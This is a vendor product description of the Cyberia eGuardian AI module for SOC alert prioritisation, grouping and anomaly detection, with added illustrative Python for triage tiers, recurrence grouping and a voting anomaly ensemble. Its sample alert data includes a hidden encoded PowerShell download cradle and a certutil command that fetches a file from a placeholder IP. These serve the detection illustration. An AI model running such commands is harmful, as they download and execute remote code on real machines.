The TEHTRIS AI R&D team has developed from scratch an Artificial Intelligence based module called Cyberia eGuardian. The aim of this module is to help SOC analysts, directly from the XDR Platform, keep control of IT security and save time. Cyberia eGuardian keeps a 360° watch, 24/7, over endpoint security events and performs a complete pretreatment on them: it prioritizes, groups and highlights security incidents for SOC analysts.
Cyberia eGuardian offers an advanced Deep Learning analysis of TEHTRIS EDR Optimus alerts and events, which is planned to extend to all XDR products in future releases. The analysis has two parts: on the one hand, each alert and event is qualified as “High Priority” or “Low Priority” and as “Anomaly” or not; on the other hand, alerts and events are grouped by action (the same action seen over time across the IT infrastructure) and by execution (a single process run on one machine).
Alert prioritisation and AI continuous learning
The Cyberia eGuardian Artificial Intelligence model is trained to distinguish high priority alerts amongst the mass of low priority alerts and events.
The High or Low priority attribution is based on an AI inferred Priority Score that goes from 0%, for the lowest probability of being a dangerous alert, to 100%, for the highest probability of being dangerous.
MSSP strategy with Cyberia eGuardian
Cyberia eGuardian pretreatment and prioritization let analysts optimize their time by automatically identifying the urgent and important security events to focus on first. TEHTRIS proposes a customizable MSSP strategy that combines a MITRE based severity qualification with the AI based priority score, as in the figure below.
Figure: MSSP Analysis with Cyberia eGuardian (Priority and Severity complementarity)
This strategy pinpoints the top priority security events, sparing analysts most of the time-consuming, uninteresting and low value routine triage tasks. Cyberia eGuardian analysis automatically sorts alerts by priority, reducing the volume the SOC analyst has to look at to about 0.1% of the incoming alerts, a significant time-saver for the operational security team.
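The combination described above, as an added example (not TEHTRIS code): a MITRE-based severity taken from the tactic of the rule that fired, an AI priority score, and a small matrix that turns the two into an analyst work queue. The tactic-to-severity map, the score bands, the tier rules and the sample alerts are all assumptions chosen to show the mechanism; the page does not publish the actual matrix.

```python
"""Triage queue combining a MITRE-based severity with an AI priority score.

Added example, not TEHTRIS code: the tactic-to-severity map, the score bands and the
tier rules are assumptions standing in for the matrix the text refers to.
"""
from dataclasses import dataclass

# Severity of a rule is taken from the MITRE ATT&CK tactic it maps to (assumed mapping).
TACTIC_SEVERITY = {
    "TA0001": "medium",    # Initial Access
    "TA0002": "medium",    # Execution
    "TA0003": "high",      # Persistence
    "TA0004": "high",      # Privilege Escalation
    "TA0005": "medium",    # Defense Evasion
    "TA0006": "high",      # Credential Access
    "TA0007": "low",       # Discovery
    "TA0008": "high",      # Lateral Movement
    "TA0010": "critical",  # Exfiltration
    "TA0040": "critical",  # Impact
}
SEVERITY_RANK = {"low": 0, "medium": 1, "high": 2, "critical": 3}


@dataclass(frozen=True)
class Alert:
    alert_id: str
    host: str
    tactic: str       # MITRE ATT&CK tactic ID of the rule that fired
    priority: float   # AI priority score in [0, 1] (the page's 0%..100%)


def severity_of(alert):
    return TACTIC_SEVERITY.get(alert.tactic, "low")


def priority_band(score):
    """Bucket the AI score; the cut-offs are assumptions."""
    if score >= 0.8:
        return "high"
    if score >= 0.4:
        return "medium"
    return "low"


def triage_tier(alert):
    """1 = analyse now, 2 = today, 3 = when the queue allows, 4 = backlog."""
    sev = SEVERITY_RANK[severity_of(alert)]
    band = priority_band(alert.priority)
    if band == "high" and sev >= 2:
        return 1
    if band == "high" or sev == 3:
        return 2   # the two signals disagree: a human still looks, but not first
    if band == "medium" and sev >= 1:
        return 3
    return 4


def build_queue(alerts):
    """Analyst work queue: lowest tier first, then highest AI score."""
    return sorted(alerts, key=lambda a: (triage_tier(a), -a.priority))


def tier_counts(alerts):
    counts = {1: 0, 2: 0, 3: 0, 4: 0}
    for a in alerts:
        counts[triage_tier(a)] += 1
    return counts


# Constructed sample alerts (not real product output).
SAMPLE_ALERTS = [
    Alert("A1", "WS01", "TA0006", 0.95),   # credential access, AI says high
    Alert("A2", "WS02", "TA0007", 0.05),   # discovery noise
    Alert("A3", "SRV01", "TA0040", 0.30),  # impact tactic but the AI thinks it is routine
    Alert("A4", "WS03", "TA0002", 0.60),
    Alert("A5", "WS01", "TA0005", 0.90),   # AI high, MITRE only medium
    Alert("A6", "WS04", "TA0007", 0.50),
    Alert("A7", "WS05", "TA0008", 0.85),   # lateral movement, AI high
]

if __name__ == "__main__":
    for a in build_queue(SAMPLE_ALERTS):
        print(triage_tier(a), a.alert_id, severity_of(a), f"{a.priority:.0%}")
    print(tier_counts(SAMPLE_ALERTS))
```

The point of the matrix is that neither signal overrides the other: an Impact-tactic alert with a low AI score (A3) and a Defense Evasion alert with a high AI score (A5) both land in tier 2 rather than being dropped, while only alerts where both signals agree reach tier 1.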
AI personalization and man-in-the-loop continuous learning
The Artificial Intelligence base model adapts automatically to each customer's specifics and preferences a few days after deployment, thanks to in-place continuous learning of the neural network. This allows the Cyberia eGuardian AI model to evolve and learn as the customer's environment changes over time.
Cyberia eGuardian is based on a supervised Deep Neural Network model, which means it needs labeled data to learn. Alerts are automatically labeled as “High Priority” or “Low Priority” from direct and indirect SOC analyst feedback, in a man-in-the-loop continuous learning approach. This approach keeps security experts in control of the AI security tool.
Grouping and Anomaly Detection
It is well known that a large share of alerts and events is generated by actions that recur with some regularity.
Quickly identifying new or rare alerts among them can become a challenge. To address this, Cyberia eGuardian enriches and contextualizes every alert and event with Recurrence Insights.
The Recurrence, i.e. the number of alerts generated by the same action, is given together with the first seen and last seen dates, statistics on the action's hourly frequency and distribution over the last 24 hours, and the list of endpoints where the action has been seen.
Cyberia eGuardian also groups multiple alerts automatically, based on predefined conditions on their associated process, so that all grouped alerts come from the same execution. This gives a whole view of the information gathered over time on that process by the multiple EDR modules.
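The two groupings described above (recurrence of the same action across the fleet, and grouping by process execution on one host), as an added example that is not TEHTRIS code. The alert field names, the definition of an "action" as (rule, image, command line), and the sample alerts are assumptions chosen for the illustration.

```python
"""Recurrence insights and execution grouping over constructed EDR alerts.

Added example, not TEHTRIS code: field names, the action key and the sample alerts
are assumptions chosen to illustrate the two groupings the text describes.
"""
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Fixed reference time so the 24-hour window is deterministic.
NOW = datetime(2024, 3, 1, 12, 0, tzinfo=timezone.utc)


def mk(alert_id, minutes_ago, host, module, rule, image, cmdline, pid, pstart_minutes_ago=None):
    """Build one constructed alert; (host, pid, pstart) identifies the process execution."""
    ts = NOW - timedelta(minutes=minutes_ago)
    pstart = ts if pstart_minutes_ago is None else NOW - timedelta(minutes=pstart_minutes_ago)
    return {"id": alert_id, "ts": ts, "host": host, "module": module, "rule": rule,
            "image": image, "cmdline": cmdline, "pid": pid, "pstart": pstart}


CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
BACKUP = r"cmd.exe /c C:\Temp\backup.bat"
ENC = "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"  # constructed

# Constructed sample: a scheduled backup script seen on three endpoints, plus one
# PowerShell execution on WS07 that three different EDR modules alerted on.
SAMPLE_ALERTS = [
    mk("A1", 60, "WS01", "process-monitor", "script-from-temp", CMD, BACKUP, 1001),
    mk("A2", 120, "WS01", "process-monitor", "script-from-temp", CMD, BACKUP, 1002),
    mk("A3", 180, "WS02", "process-monitor", "script-from-temp", CMD, BACKUP, 1003),
    mk("A4", 300, "WS01", "process-monitor", "script-from-temp", CMD, BACKUP, 1004),
    mk("A5", 420, "WS03", "process-monitor", "script-from-temp", CMD, BACKUP, 1005),
    mk("A6", 26 * 60, "WS02", "process-monitor", "script-from-temp", CMD, BACKUP, 1006),
    mk("B1", 10, "WS07", "process-monitor", "encoded-powershell", PS, ENC, 4242),
    mk("B2", 9, "WS07", "network-monitor", "outbound-to-rare-domain", PS, ENC, 4242, 10),
    mk("B3", 8, "WS07", "file-monitor", "write-to-startup-folder", PS, ENC, 4242, 10),
]


def action_key(alert):
    """Identity of an 'action': same rule on the same image and command line.
    A real deployment would also normalise volatile parts (temp names, GUIDs, PIDs)."""
    return (alert["rule"], alert["image"].lower(), alert["cmdline"].lower())


def recurrence_insights(alerts, now=NOW):
    """Per action: count, first/last seen, endpoints and the hourly histogram of the last 24 h.
    hourly[0] is the current hour, hourly[23] the oldest hour inside the window."""
    groups = defaultdict(list)
    for a in alerts:
        groups[action_key(a)].append(a)
    insights = {}
    for key, items in groups.items():
        hourly = [0] * 24
        for a in items:
            hours_ago = int((now - a["ts"]).total_seconds() // 3600)
            if 0 <= hours_ago < 24:
                hourly[hours_ago] += 1
        insights[key] = {
            "count": len(items),
            "first_seen": min(a["ts"] for a in items),
            "last_seen": max(a["ts"] for a in items),
            "endpoints": sorted({a["host"] for a in items}),
            "last_24h": sum(hourly),
            "hourly": hourly,
            "mean_per_hour": sum(hourly) / 24,
        }
    return insights


def rare_actions(insights, max_count=1):
    """Actions seen at most max_count times: the new or rare alerts worth a first look."""
    return sorted(k for k, v in insights.items() if v["count"] <= max_count)


def group_by_execution(alerts):
    """Group alerts raised on the same process execution (host, pid, process start time),
    so every module's findings about one process are read together."""
    groups = defaultdict(lambda: {"alerts": [], "modules": set()})
    for a in alerts:
        g = groups[(a["host"], a["pid"], a["pstart"])]
        g["alerts"].append(a["id"])
        g["modules"].add(a["module"])
    return {k: {"alerts": v["alerts"], "modules": sorted(v["modules"])} for k, v in groups.items()}


if __name__ == "__main__":
    ins = recurrence_insights(SAMPLE_ALERTS)
    for key, v in ins.items():
        print(key[0], v["count"], v["endpoints"], "last 24h:", v["last_24h"])
    print("rare:", [k[0] for k in rare_actions(ins)])
    for key, g in group_by_execution(SAMPLE_ALERTS).items():
        if len(g["modules"]) > 1:
            print("multi-module execution", key[:2], g)
```

Run on the constructed sample, the backup action shows 6 alerts on 3 endpoints (5 inside the 24-hour window, so the 26-hour-old one sets first seen but not the histogram), and the three WS07 alerts collapse into one execution group with three modules, which is what an analyst wants to read as a single case rather than three tickets.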
Anomaly Detection
Cyberia eGuardian offers an anomaly detection analysis. It is based on the predictions of multiple unsupervised AI models, each of which votes for the final anomaly prediction. The aim of this feature is to report unusual alerts based on their content. The anomaly detection models learn every day in order to keep track of changes in the customer's security event baseline.
Thanks to the information gathered from the AI predictions, Cyberia eGuardian can provide an at-risk ranking of machines and users. Each security event is enriched with machine and user context based on insights from the Cyberia eGuardian anomaly detection models.
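The voting mechanism and the at-risk ranking described above, as an added example that is not TEHTRIS code. The three detectors (rarity of the parent/child process pair, z-score on command-line length, novelty of the user/host pair), the majority threshold, and the baseline and "today" alerts are all assumptions chosen to show how independent unsupervised models vote and how anomaly counts roll up per machine and per user; they are not the models the product actually uses.

```python
"""Illustrative unsupervised anomaly ensemble with majority vote, plus at-risk ranking.

Added example, not TEHTRIS code: the detectors, the vote threshold and the
constructed baseline are assumptions that show the mechanism only.
"""
import statistics
from collections import Counter


def mk(user, host, parent, image, cmdline):
    """One constructed alert record."""
    return {"user": user, "host": host, "parent": parent, "image": image, "cmdline": cmdline}


def baseline_alerts():
    """Constructed 'yesterday' baseline the detectors are refit on (50 benign-looking alerts)."""
    return ([mk("alice", "WS01", "explorer.exe", "outlook.exe", "outlook.exe /recycle")] * 20
            + [mk("SYSTEM", "WS01", "services.exe", "svchost.exe", "svchost.exe -k netsvcs -p")] * 20
            + [mk("bob", "WS02", "explorer.exe", "chrome.exe", "chrome.exe --profile-directory=Default")] * 10)


class RarityDetector:
    """Votes 'anomaly' when the (parent, image) pair is rare in the baseline."""
    def __init__(self, min_share=0.02):
        self.min_share, self.counts, self.total = min_share, Counter(), 0
    def fit(self, baseline):
        self.counts = Counter((a["parent"], a["image"]) for a in baseline)
        self.total = len(baseline)
    def is_anomaly(self, a):
        return self.counts[(a["parent"], a["image"])] / self.total < self.min_share


class CmdlineLengthDetector:
    """Votes 'anomaly' when the command-line length is a z-score outlier (e.g. encoded commands)."""
    def __init__(self, z=3.0):
        self.z, self.mean, self.std = z, 0.0, 1.0
    def fit(self, baseline):
        lengths = [len(a["cmdline"]) for a in baseline]
        self.mean = statistics.fmean(lengths)
        self.std = statistics.pstdev(lengths) or 1.0
    def is_anomaly(self, a):
        return abs(len(a["cmdline"]) - self.mean) / self.std > self.z


class NoveltyDetector:
    """Votes 'anomaly' when the (user, host) pair was never seen in the baseline."""
    def __init__(self):
        self.seen = set()
    def fit(self, baseline):
        self.seen = {(a["user"], a["host"]) for a in baseline}
    def is_anomaly(self, a):
        return (a["user"], a["host"]) not in self.seen


class VotingEnsemble:
    """Majority vote over independent detectors; fit() is what the daily relearning calls."""
    def __init__(self, detectors, min_votes=2):
        self.detectors, self.min_votes = detectors, min_votes
    def fit(self, baseline):
        for d in self.detectors.values():
            d.fit(baseline)
        return self
    def predict(self, alert):
        votes = {name: d.is_anomaly(alert) for name, d in self.detectors.items()}
        return sum(votes.values()) >= self.min_votes, votes


def at_risk_ranking(alerts, ensemble, field):
    """Rank machines (field='host') or users (field='user') by number of anomalous alerts."""
    return Counter(a[field] for a in alerts if ensemble.predict(a)[0]).most_common()


def build_ensemble():
    return VotingEnsemble({"rarity": RarityDetector(), "cmdline_length": CmdlineLengthDetector(),
                           "novelty": NoveltyDetector()}).fit(baseline_alerts())


# Constructed encoded command line (long, so it trips the length detector).
ENC = "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"

# Constructed alerts for "today".
TODAY = [
    mk("alice", "WS01", "winword.exe", "powershell.exe", ENC),
    mk("bob", "WS02", "explorer.exe", "chrome.exe", "chrome.exe --profile-directory=Default"),
    mk("mallory", "WS02", "explorer.exe", "chrome.exe", "chrome.exe --profile-directory=Default"),
    mk("alice", "WS01", "explorer.exe", "certutil.exe", "certutil.exe -urlcache -split -f http://198.51.100.7/a.txt a.txt"),
    mk("mallory", "WS03", "explorer.exe", "powershell.exe", ENC),
]

if __name__ == "__main__":
    ens = build_ensemble()
    for a in TODAY:
        print(a["user"], a["host"], a["image"], ens.predict(a))
    print("hosts:", at_risk_ranking(TODAY, ens, "host"))
    print("users:", at_risk_ranking(TODAY, ens, "user"))
```

The vote is what keeps a single weak signal from flooding the queue: a new user on a known host (third alert) gets one vote and stays "not anomaly", while Word spawning an encoded PowerShell gets two votes from independent detectors and is reported with the votes attached, which is also the raw material for the explanation the next section describes. The ranking then simply counts anomalous alerts per host and per user.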
AI Explanation and security insights
Ethics and Trust, as principles at the heart of TEHTRIS, have led the R&D teams to develop ethical and transparent AI models. Cyberia eGuardian therefore explains its predictions: the explanation highlights the variables of the security event on which the AI algorithm based its choice.
This explanation of its predictions is what makes Cyberia eGuardian not only an Artificial Intelligence tool but an Augmented Intelligence defense weapon, giving experts the information they need to make the final decision.